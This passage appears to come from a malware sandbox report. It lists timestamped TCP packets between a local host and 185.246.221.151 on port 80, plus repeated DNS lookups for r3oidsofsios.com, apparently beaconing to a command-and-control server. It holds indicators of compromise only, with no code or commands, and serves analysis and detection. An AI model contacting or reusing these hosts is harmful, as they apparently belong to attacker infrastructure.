                          Nov 30, 2022 00:12:33.875849009 CET8049719185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:33.879772902 CET4971980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.879952908 CET4971980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:33.882788897 CET4971980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.002124071 CET8049719185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.003755093 CET4971980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.003755093 CET4971980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.035089970 CET8049719185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.037684917 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.067559958 CET8049720185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.067692041 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.067845106 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.068521023 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.095871925 CET8049720185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.098995924 CET8049720185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.185307026 CET8049720185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.187817097 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.187860012 CET4972080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.218614101 CET8049720185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.493693113 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.520711899 CET8049721185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.520920038 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.521208048 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.524586916 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.550765038 CET8049721185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.551623106 CET8049721185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.641350031 CET8049721185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.641876936 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.642647028 CET4972180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.669584036 CET8049721185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.670512915 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.698249102 CET8049722185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.698527098 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.698724031 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.698757887 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.726028919 CET8049722185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.817260981 CET8049722185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.817403078 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.823817015 CET4972280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.852149010 CET8049722185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.852220058 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.881596088 CET8049723185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:34.881721020 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.881849051 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.881849051 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:34.917690992 CET8049723185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.017662048 CET8049723185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.018322945 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.018462896 CET4972380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.050568104 CET8049723185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.320079088 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.347726107 CET8049724185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.347901106 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.348030090 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.348050117 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.374792099 CET8049724185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.459623098 CET8049724185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.459791899 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.459882975 CET4972480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.488888979 CET8049724185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.495191097 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.522485018 CET8049725185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.522613049 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.522797108 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.522823095 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.550544977 CET8049725185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.638067961 CET8049725185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.638237953 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.638695002 CET4972580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.671025991 CET8049725185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.694097996 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.722270966 CET8049726185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.722484112 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.722484112 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.722635031 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.750051022 CET8049726185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.841212034 CET8049726185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.841469049 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.841469049 CET4972680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.871767044 CET8049726185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.871948957 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.900384903 CET8049727185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:35.900567055 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.900690079 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.900711060 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:35.932673931 CET8049727185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.028471947 CET8049727185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.028603077 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.029257059 CET4972780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.063178062 CET8049727185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.068641901 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.105657101 CET8049728185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.105761051 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.105882883 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.105950117 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.141792059 CET8049728185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.227736950 CET8049728185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.227860928 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.227966070 CET4972880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.263189077 CET8049728185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.366962910 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.395018101 CET8049729185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.395195007 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.395279884 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.395329952 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.424024105 CET8049729185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.515480042 CET8049729185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.516413927 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.516491890 CET4972980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.544312000 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.546022892 CET8049729185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.575936079 CET8049730185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.576366901 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.576366901 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.576366901 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.605474949 CET8049730185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.694408894 CET8049730185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.694561958 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.694561958 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.730839014 CET8049730185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.998038054 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030442953 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.061671019 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.153716087 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.154509068 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.154568911 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.183823109 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.184279919 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.214330912 CET8049732185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.214524984 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.214968920 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.214968920 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.243493080 CET8049732185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.334481001 CET8049732185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.334733009 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.335803986 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.363866091 CET8049732185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.374278069 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.403678894 CET8049733185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.403834105 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.404042959 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.404042959 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.432388067 CET8049733185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.519344091 CET8049733185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.519987106 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.520072937 CET4973380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.550010920 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.550288916 CET8049733185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.577991009 CET8049734185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.578107119 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.578322887 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.578350067 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.611852884 CET8049734185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.706790924 CET8049734185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.711175919 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.711175919 CET4973480192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.751033068 CET8049734185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.756057978 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.810843945 CET8049735185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.811109066 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.811109066 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.811254025 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.842073917 CET8049735185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.938654900 CET8049735185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.939137936 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.939138889 CET4973580192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.968122959 CET8049735185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.970060110 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.998667955 CET8049736185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.999078035 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.007920027 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.007920027 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.036375046 CET8049736185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.127856016 CET8049736185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.128108978 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.128170967 CET4973680192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.155149937 CET8049736185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.159787893 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.187099934 CET8049737185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.187350988 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.187767029 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.187999964 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.216401100 CET8049737185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.306819916 CET8049737185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.307228088 CET8049737185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.307271004 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.307588100 CET4973780192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.336150885 CET8049737185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.361372948 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.389053106 CET8049738185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.389161110 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.389544964 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.389569998 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.416693926 CET8049738185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.503267050 CET8049738185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.503588915 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.522610903 CET4973880192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.555016041 CET8049738185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.774741888 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.807013035 CET8049739185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.807307005 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.844290018 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.844290018 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.875030041 CET8049739185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.964234114 CET8049739185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:38.964453936 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:38.972148895 CET4973980192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.000761986 CET8049739185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.004362106 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.042252064 CET8049740185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.042609930 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.079370022 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.079370022 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.110649109 CET8049740185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.204178095 CET8049740185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.205167055 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.205579996 CET4974080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.234817982 CET8049740185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.293708086 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.321270943 CET8049741185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.321393967 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.321549892 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.321588993 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.351839066 CET8049741185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.438452959 CET8049741185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.439425945 CET8049741185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.439560890 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.440701962 CET4974180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.469428062 CET8049741185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.527334929 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:39.555160046 CET8049742185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:39.555358887 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.168219090 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.168253899 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.196892977 CET8049742185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.297549009 CET8049742185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.297688007 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.308461905 CET4974280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.337305069 CET8049742185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.350506067 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.378957987 CET8049743185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.379125118 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.415658951 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.415714025 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.444228888 CET8049743185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.529710054 CET8049743185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:40.529802084 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.532679081 CET4974380192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:40.561741114 CET8049743185.246.221.151192.168.2.7

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 30, 2022 00:12:31.576731920 CET5100753192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:31.867197037 CET53510078.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:32.519501925 CET5051353192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:32.811173916 CET53505138.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:33.003753901 CET6076553192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:33.028825998 CET53607658.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:33.193178892 CET5828353192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:33.212548971 CET53582838.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:33.470622063 CET5002453192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:33.821990967 CET53500248.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:34.020052910 CET4951653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:34.036792994 CET53495168.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:34.196407080 CET6267953192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:34.488857985 CET53626798.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:34.650456905 CET6139253192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:34.669634104 CET53613928.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:34.832746983 CET5210453192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:34.851197958 CET53521048.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:35.027832985 CET6535653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:35.319250107 CET53653568.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:35.475203037 CET5900653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:35.494378090 CET53590068.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:35.653045893 CET5152653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:35.672054052 CET53515268.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:35.851425886 CET5113953192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:35.871113062 CET53511398.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:36.038981915 CET5878453192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:36.067956924 CET53587848.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:36.250511885 CET5797053192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:36.359834909 CET53579708.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:36.525525093 CET6460853192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:36.543272018 CET53646088.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:36.705869913 CET5874653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:36.996306896 CET53587468.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:37.164571047 CET6243353192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:37.183329105 CET53624338.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:37.352591038 CET6124853192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:37.373538971 CET53612488.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:37.531023026 CET5275053192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:37.549065113 CET53527508.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:37.720558882 CET6407853192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:37.750535965 CET53640788.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:37.949290991 CET5023153192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:37.969152927 CET53502318.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:38.138925076 CET5851453192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:38.158756018 CET53585148.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:38.340357065 CET5143653192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:38.360474110 CET53514368.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:38.756226063 CET5905353192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:38.774048090 CET53590538.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:38.983336926 CET5194553192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:39.002141953 CET53519458.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:39.224884987 CET6318753192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:39.242450953 CET53631878.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:39.508954048 CET6476053192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:39.526495934 CET53647608.8.8.8192.168.2.7
                          Nov 30, 2022 00:12:40.331233978 CET5363753192.168.2.78.8.8.8
                          Nov 30, 2022 00:12:40.349824905 CET53536378.8.8.8192.168.2.7

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 30, 2022 00:12:31.576731920 CET192.168.2.78.8.8.80xe620Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:32.519501925 CET192.168.2.78.8.8.80x9a00Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.003753901 CET192.168.2.78.8.8.80xcb73Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.193178892 CET192.168.2.78.8.8.80xd2b9Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.470622063 CET192.168.2.78.8.8.80xd702Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.020052910 CET192.168.2.78.8.8.80xde7cStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.196407080 CET192.168.2.78.8.8.80x80e4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.650456905 CET192.168.2.78.8.8.80x2609Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.832746983 CET192.168.2.78.8.8.80xbf35Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.027832985 CET192.168.2.78.8.8.80x883fStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.475203037 CET192.168.2.78.8.8.80xef7Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.653045893 CET192.168.2.78.8.8.80x7e44Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.851425886 CET192.168.2.78.8.8.80xb4f1Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.038981915 CET192.168.2.78.8.8.80x6dd1Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.250511885 CET192.168.2.78.8.8.80x8b45Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.525525093 CET192.168.2.78.8.8.80x7568Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.705869913 CET192.168.2.78.8.8.80x4443Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.164571047 CET192.168.2.78.8.8.80xc6d7Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.352591038 CET192.168.2.78.8.8.80x2915Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.531023026 CET192.168.2.78.8.8.80x8766Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.720558882 CET192.168.2.78.8.8.80xdb37Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.949290991 CET192.168.2.78.8.8.80x67f0Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.138925076 CET192.168.2.78.8.8.80xebc7Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.340357065 CET192.168.2.78.8.8.80xb147Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.756226063 CET192.168.2.78.8.8.80x39bdStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.983336926 CET192.168.2.78.8.8.80xcceaStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
